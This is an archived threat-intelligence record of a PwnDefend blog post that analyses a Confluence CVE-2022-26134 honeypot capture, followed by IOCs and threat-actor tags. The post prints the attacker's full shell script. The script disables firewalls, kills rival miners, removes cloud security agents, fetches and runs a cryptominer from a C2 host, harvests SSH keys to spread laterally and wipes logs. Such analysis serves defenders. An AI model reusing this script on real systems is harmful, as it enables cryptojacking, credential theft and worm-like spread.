{
	"id": "ea9d31ee-5067-4a95-ab76-89d85b46e17a",
	"created_at": "2026-04-06T00:15:00.818089Z",
	"updated_at": "2026-04-10T03:34:59.811691Z",
	"deleted_at": null,
	"sha1_hash": "9ad5cc6f89f77fe9923e22a0b5566ce444c1a9eb",
	"title": "CVE-2022-26134 – Honeypot Payload Analysis Example – PwnDefend",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 298628,
	"plain_text": "CVE-2022-26134 – Honeypot Payload Analysis Example – PwnDefend\r\nArchived: 2026-04-05 18:16:04 UTC\r\nThreat actors are deploying a range of payloads to try and exploit vulnerable Confluence servers around the globe. This just dropped into one of the pots:\r\nThe HTTP command executes this:\r\ncurl http[:]//202.28.229.174/ap[.]sh?confcurl\r\nThis downloads the following (ap.sh):\r\n$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing\r\n$stealz.Content | Out-File ap.txt\r\nhttps://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/\r\nPage 1 of 10\n\nDownloading a sample using PowerShell Invoke-WebRequest (iwr or wget) with basic parsing\r\nI’ve defanged the URLs:\r\n#!/bin/bash\r\n#microsoft\r\n#lkasdjfjasdflkajdsflkajsdflk;ajdsflk jalskdjf lkasjdf ;lkajsdflkajsdfl;kj asldfkj\r\n#ijinvuneufdjknflaskdfj ijdif idnfmikdnfkjsfkdjfi hif\r\nexport PATH=$PATH:/tmp:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/tmp:/dev/shm\r\ncc=\"hxxp[://]202[.]28[.]229[.]174\"\r\nCURL_DOWNLOAD_URL=\"hxxp[://]202[.]28[.]229[.]174/curl\"\r\nsys=$(date|md5sum|awk -v n=\"$(date +%s)\" '{print substr($1,1,n%7+6)}')\r\nif [ $(ps -fe|grep hezb |grep -v grep|wc -l) -eq 1 ];then\r\n exit;\r\nfi\r\npkill -9 -f rodolf\r\nfunction __curl() {\r\n read proto server path \u003c\u003c\u003c$(echo ${1//// })\r\n DOC=/${path// //}\r\n HOST=${server//:*}\r\n PORT=${server//*:}\r\n [[ x\"${HOST}\" == x\"${PORT}\" ]] \u0026\u0026 PORT=82\r\n exec 3\u003c\u003e/dev/tcp/${HOST}/$PORT\r\n echo -en \"GET ${DOC} HTTP/1.0\\r\\nHost: ${HOST}\\r\\n\\r\\n\" \u003e\u00263\r\n (while read line; do\r\n [[ \"$line\" == $'\\r' ]] \u0026\u0026 break\r\n done \u0026\u0026 cat) \u003c\u00263\r\n exec 3\u003e\u0026-\r\n}\r\nif [ -x \"$(command -v curl)\" ]; then\r\n WGET=\"curl -o\"\r\nelif [ -x \"$(command -v wget)\" ]; then\r\n WGET=\"wget -O\"\r\nelse\r\n PATH=\".:$PATH\"; curld -V || __curl \"$CURL_DOWNLOAD_URL\" \u003e /usr/local/bin/.curld; chmod +x /usr/local/bin/.curl\r\n PATH=\".:$PATH\"; /usr/local/bin/.curld -V \u0026\u0026 WGET=\"/usr/local/bin/.curl -o\"\r\n PATH=\".:$PATH\"; /usr/local/bin/.curl -V || __curl \"$CURL_DOWNLOAD_URL\" \u003e $HOME/.curld; chmod +x $HOME/.curld\r\n PATH=\".:$PATH\"; $HOME/.curld -V \u0026\u0026 WGET=\"$HOME/.curl -o\"\r\n PATH=\".:$PATH\"; $HOME/.curld -V || __curl \"$CURL_DOWNLOAD_URL\" \u003e .curld; chmod +x .curld\r\n PATH=\".:$PATH\"; ./.curld -V \u0026\u0026 WGET=\"./.curld -o\"\r\n PATH=\".:$PATH\"; ./.curld -V || __curl \"$CURL_DOWNLOAD_URL\" \u003e /var/tmp/.curld; chmod +x /var/tmp/.curld\r\n PATH=\".:$PATH\"; /var/tmp/.curld -V \u0026\u0026 WGET=\"/var/tmp/.curld -o\"\r\nfi\r\necho \"wget is $WGET\"\r\nget() {\r\n $WGET $2 $1\r\n chmod +x $2\r\n}\r\nufw disable\r\niptables -P INPUT ACCEPT\r\niptables -P OUTPUT ACCEPT\r\niptables -P FORWARD ACCEPT\r\niptables -F\r\nchattr -ia /etc/ld[.]so[.]preload\r\ncat /dev/null\u003e/etc/ld[.]so[.]preload\r\nf=false\r\nfindDir() {\r\n for i in $(ls $1 | grep -v proc); do\r\n if $f; then return; fi\r\n p=\"${1}\"\"/$i\"\r\n if [ -d $p -a -r $p ]; then\r\n if [ -w $p -a -x $p ]; then\r\n echo exit\u003e$p/i \u0026\u0026 chmod +x $p/i \u0026\u0026 cd $p \u0026\u0026 ./i \u0026\u0026 rm -f i \u0026\u0026 f=true \u0026\u0026 return\r\n fi\r\n findDir $p\r\n fi\r\n done\r\n}\r\nfindDir /\r\nrm -rf dom; rm -rf a[.]sh; rm -rf ko\r\ncrontab -r\r\ncrontab -l|sed '/\\.bashgo\\|pastebin\\|onion\\|bprofr\\|python/d'|crontab -\r\ncat /proc/mounts|awk '{print $2}'|grep -P '/proc/\\d+'|grep -Po '\\d+'|xargs -I % kill -9 %\r\nps -ef | grep -v grep | grep confssh | awk '{print $2}' | xargs -i kill -9 {}\r\nps -ef | grep -v grep | grep rodolf | awk '{print $2}' | xargs -i kill -9 {}\r\nps -ef | grep -v grep | grep cruner | awk '{print $2}' | xargs -i kill -9 {}\r\nnetstat -antp | grep 125.39.100.42 | awk '{print $7}' | awk -F[/] '{print $1}' | xargs -i kill -9 {}\r\npkill -9 sidekiq\r\npkill -9 bashirc\r\npkill -9 -f bashirc\r\npkill -9 -f mysqldd\r\npkill -9 -f rodolf[.]sh\r\npkill -9 -f kinsing\r\npkill -9 -f rodolf\r\npkill -9 -f sshexec\r\npkill -9 -f cnrig\r\npkill -9 -f attack\r\npkill -9 -f dovecat\r\npkill -9 -f javae\r\npkill -9 -f donate\r\npkill -9 -f 'scan\\.log'\r\npkill -9 -f xmr-stak\r\npkill -9 -f crond64\r\npkill -9 -f stratum\r\npkill -9 -f /tmp/java\r\npkill -9 -f pastebin\r\npkill -9 -f '/tmp/\\.'\r\npkill -9 -f /tmp/system\r\npkill -9 -f excludefile\r\npkill -9 -f agettyd\r\npkill -9 -f /dev/shm\r\npkill -9 -f /var/tmp\r\npkill -9 -f '\\./python'\r\npkill -9 -f '\\./crun'\r\npkill -9 -f '\\./\\.'\r\npkill -9 -f '118/cf\\.sh'\r\npkill -9 -f /tmp/.UNIFI/.unifi[.]sh\r\npkill -9 '\\.6379'\r\npkill -9 'load\\.sh'\r\npkill -9 'init\\.sh'\r\npkill -9 'solr\\.sh'\r\npkill -9 '\\.rsyslogds'\r\npkill -9 pnscan\r\npkill -9 masscan\r\npkill -9 kthreaddi\r\npkill -9 -f -bash\r\npkill -9 kdevtmpfsi\r\npkill -9 solrd\r\npkill -9 meminitsrv\r\npkill -9 networkservice\r\npkill -9 sysupdate\r\npkill -9 phpguard\r\npkill -9 phpupdate\r\npkill -9 networkmanager\r\npkill -9 knthread\r\npkill -9 mysqlserver\r\npkill -9 watchbog\r\npkill -9 xmrig\r\npkill -9 bashirc\r\npkill -9 zgrab\r\nkillall -9 /tmp/*\r\nkillall -9 /var/tmp/*\r\nfor i in $(ls /proc|grep '[0-9]'); do\r\n if ls -al /proc/$i 2\u003e/dev/null|grep hezb 2\u003e/dev/null; then\r\n continue\r\n fi\r\n if grep -a 'donate-level=' /proc/$i/exe 1\u003e/dev/null 2\u003e\u00261; then\r\n kill -9 $i\r\n fi\r\n if ls -al /proc/$i | grep exe | grep \"/var/tmp\\|/tmp\"; then\r\n kill -9 $i\r\n fi\r\ndone\r\nif [ $(id -u) -eq 0 ]; then\r\nif ps aux|grep -i \"[a]liyun\"; then\r\n curl hxxp[://]update[.]aegis[.]aliyun[.]com/download/uninstall[.]sh|bash\r\n curl hxxp[://]update[.]aegis[.]aliyun[.]com/download/quartz_uninstall[.]sh|bash\r\n pkill aliyun-service\r\n rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service /usr/local/aegis*\r\n systemctl stop aliyun[.]service\r\n systemctl disable aliyun[.]service\r\n service bcm-agent stop\r\n yum remove bcm-agent -y\r\n apt-get remove bcm-agent -y\r\n elif ps aux|grep -i \"[y]unjing\"; then\r\n /usr/local/qcloud/stargate/admin/uninstall[.]sh\r\n /usr/local/qcloud/YunJing/uninst[.]sh\r\n /usr/local/qcloud/monitor/barad/admin/uninstall[.]sh\r\n fi\r\nfi\r\na=$(nproc | grep -v nproc)\r\nb=4\r\nif [ \"$a\" -gt \"$b\" ]; then\r\n miner=\"-o 106.251.252.226:4545 -u $HOSTNAME.8\"\r\nelse\r\n miner=\"-o 106.251.252.226:4545 -u $HOSTNAME.4\"\r\nfi\r\nps -fe|grep hezb|grep -v grep; if [ $? -ne 0 ]; then\r\n md5=\"27c44dd2edc626df03504ce129f5c021\"\r\n sum=$(md5sum hezb | awk '{ print $1 }')\r\n if [ \"$md5\" = \"$sum\" ]; then\r\n chmod +x hezb; nohup hezb $miner -k -B 1\u003e/dev/null 2\u003e\u00261 \u0026\r\n PATH=\".:$PATH\"; get $cc/ap[.]txt $sys; nohup $sys 1\u003e/dev/null 2\u003e\u00261 \u0026\r\n else\r\n PATH=\".:$PATH\"; get $cc/ap[.]txt $sys; nohup $sys 1\u003e/dev/null 2\u003e\u00261 \u0026\r\n PATH=\".:$PATH\"; get $cc/sys.$(uname -m) hezb; chmod +x hezb; nohup hezb $miner -k -B 1\u003e/dev/null 2\u003e\u00261 \u0026\r\n fi\r\nfi\r\nrm -rf /tmp/.UNIFI /tmp/.destiny/*\r\nrm -rf /var/tmp/* /var/tmp/.* /tmp/* /var/.httpd $sys dlr\r\nchmod -rwx /tmp/.destiny/* /tmp/destiny\r\nKEYS=$(find ~/ /root /home -maxdepth 2 -name 'id_rsa*'|grep -vw pub)\r\nKEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config|grep IdentityFile|awk -F \"IdentityFile\" '{print\r\nKEYS3=$(find ~/ /root /home -maxdepth 3 -name '*.pem'|uniq)\r\nHOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config|grep HostName|awk -F \"HostName\" '{print $2}')\r\nHOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history|grep -E \"(ssh|scp)\"|grep -oP \"([0-9]{1,3}\r\nHOSTS3=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts|grep -oP \"([0-9]{1,3}\\.){3}[0-\r\nUSERZ=$(\r\n echo root\r\nfind ~/ /root /home -maxdepth 2 -name '\\.ssh'|uniq|xargs find|awk '/id_rsa/'|awk -F'/' '{print $3}'|uniq|gre\r\n)\r\nusers=$(echo $USERZ|tr ' ' '\\n'|nl|sort -u -k2|sort -n|cut -f2-)\r\nhosts=$(echo \"$HOSTS $HOSTS2 $HOSTS3\"|grep -vw 127.0.0.1|tr ' ' '\\n'|nl|sort -u -k2|sort -n|cut -f2-)\r\nkeys=$(echo \"$KEYS $KEYS2 $KEYS3\"|tr ' ' '\\n'|nl|sort -u -k2|sort -n|cut -f2-)\r\nfor user in $users; do\r\n for host in $hosts; do\r\n for key in $keys; do\r\n chmod +r $key; chmod 400 $key\r\n ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host \"(curl $cc/ldr\r\n done\r\n done\r\ndone\r\npkill -9 kik\r\n#PATH=\".:$PATH\"; get $cc/f \"kik\"; nohup \"kik\" 1\u003e/dev/null 2\u003e\u00261 \u0026\r\necho 0\u003e/var/spool/mail/root\r\necho 0\u003e/var/log/wtmp\r\necho 0\u003e/var/log/secure\r\necho 0\u003e/var/log/cron\r\nI’ve not got time to look at this now but it might make an interesting exercise for someone to analyse in detail!\r\nA good way to do this is GCHQ CyberChef: https://gchq.github.io/CyberChef/\r\nTry it out: SAMPLE\r\nIOCs and Analysis Info\r\nExtracted IPs:\r\n202.28.229.174\r\n202.28.229.174\r\n125.39.100.42\r\n106.251.252.226\r\n106.251.252.226\r\n127.0.0.1\r\nExtracted urls:\r\nhxxp[://]202[.]28[.]229[.]174\r\nhxxp[://]202[.]28[.]229[.]174/curl\r\nhxxp[://]update[.]aegis[.]aliyun[.]com/download/uninstall[.]sh|bash\r\nhxxp[://]update[.]aegis[.]aliyun[.]com/download/quartz_uninstall[.]sh|bash\r\nExtracted file paths:\r\n/bin/bash\r\n/tmp\r\n/bin\r\n/sbin\r\n/usr/bin\r\n/usr/sbin\r\n/usr/local/bin\r\n/usr/local/sbin\r\n/tmp\r\n/dev/shm\r\n/202.28.229.174\r\n/202.28.229.174/curl\r\n/dev/tcp\r\n/1.0\r\n/usr/local/bin/.curld\r\n/usr/local/bin/.curld\r\n/usr/local/bin/.curld\r\n/usr/local/bin/.curl\r\n/usr/local/bin/.curl\r\n/.curld\r\n/.curld\r\n/.curld\r\n/.curl\r\n/.curld\r\n/.curld\r\n/.curld\r\n/.curld\r\n/var/tmp/.curld\r\n/var/tmp/.curld\r\n/var/tmp/.curld\r\n/var/tmp/.curld\r\n/etc/ld.so.preload\r\n/dev/null\r\n/etc/ld.so.preload\r\n/i\r\n/i\r\n/i\r\n/d\r\n/proc/mounts\r\n/proc\r\n/tmp/java\r\n/tmp\r\n/tmp/system\r\n/dev/shm\r\n/var/tmp\r\n/python\r\n/crun\r\n/cf\r\n/tmp/.UNIFI/.unifi.sh\r\n/tmp\r\n/var/tmp\r\n/proc\r\n/proc\r\n/dev/null\r\n/dev/null\r\n/proc\r\n/exe\r\n/dev/null\r\n/proc\r\n/var/tmp\r\n/tmp\r\n/update.aegis.aliyun.com/download/uninstall.sh\r\n/update.aegis.aliyun.com/download/quartz\r\n/etc/init.d/agentwatch\r\n/usr/sbin/aliyun-service\r\n/usr/local/aegis\r\n/usr/local/qcloud/stargate/admin/uninstall.sh\r\n/usr/local/qcloud/YunJing/uninst.sh\r\n/usr/local/qcloud/monitor/barad/admin/uninstall.sh\r\n/dev/null\r\n/ap.txt\r\n/dev/null\r\n/ap.txt\r\n/dev/null\r\n/sys.\r\n/dev/null\r\n/tmp/.UNIFI\r\n/tmp/.destiny\r\n/var/tmp\r\n/var/tmp/.\r\n/tmp\r\n/var/.httpd\r\n/tmp/.destiny\r\n/tmp/destiny\r\n/root\r\n/home\r\n/.ssh/config\r\n/home\r\n/.ssh/config\r\n/root/.ssh/config\r\n/root\r\n/home\r\n/.ssh/config\r\n/home\r\n/.ssh/config\r\n/root/.ssh/config\r\n/.bash\r\n/home\r\n/.bash\r\n/root/.bash\r\n/.ssh/known\r\n/home\r\n/.ssh/known\r\n/root/.ssh/known\r\n/root\r\n/home\r\n/id\r\n/ldr.sh\r\n/ldr.sh\r\n/ldr.sh\r\n/f\r\n/dev/null\r\n/var/spool/mail/root\r\n/var/log/wtmp\r\n/var/log/secure\r\n/var/log/cron\r\nSource: https://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.pwndefend.com/2022/06/04/cve-2022-26134-honeypot-payload-analysis-example/"
	],
	"report_names": [
		"cve-2022-26134-honeypot-payload-analysis-example"
	],
	"threat_actors": [
		{
			"id": "5d2bd376-fcdc-4c6a-bc2c-17ebbb5b81a4",
			"created_at": "2022-10-25T16:07:23.667223Z",
			"updated_at": "2026-04-10T02:00:04.705778Z",
			"deleted_at": null,
			"main_name": "GCHQ",
			"aliases": [
				"Government Communications Headquarters",
				"Operation Socialist"
			],
			"source_name": "ETDA:GCHQ",
			"tools": [
				"Prax",
				"Regin",
				"WarriorPride"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "0409120f-2b1f-4edd-a696-75d312eb2890",
			"created_at": "2023-01-06T13:46:39.463928Z",
			"updated_at": "2026-04-10T02:00:03.337809Z",
			"deleted_at": null,
			"main_name": "Hezb",
			"aliases": [
				"Mimo"
			],
			"source_name": "MISPGALAXY:Hezb",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434500,
	"ts_updated_at": 1775792099,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ad5cc6f89f77fe9923e22a0b5566ce444c1a9eb.pdf",
		"text": "https://archive.orkl.eu/9ad5cc6f89f77fe9923e22a0b5566ce444c1a9eb.txt",
		"img": "https://archive.orkl.eu/9ad5cc6f89f77fe9923e22a0b5566ce444c1a9eb.jpg"
	}
}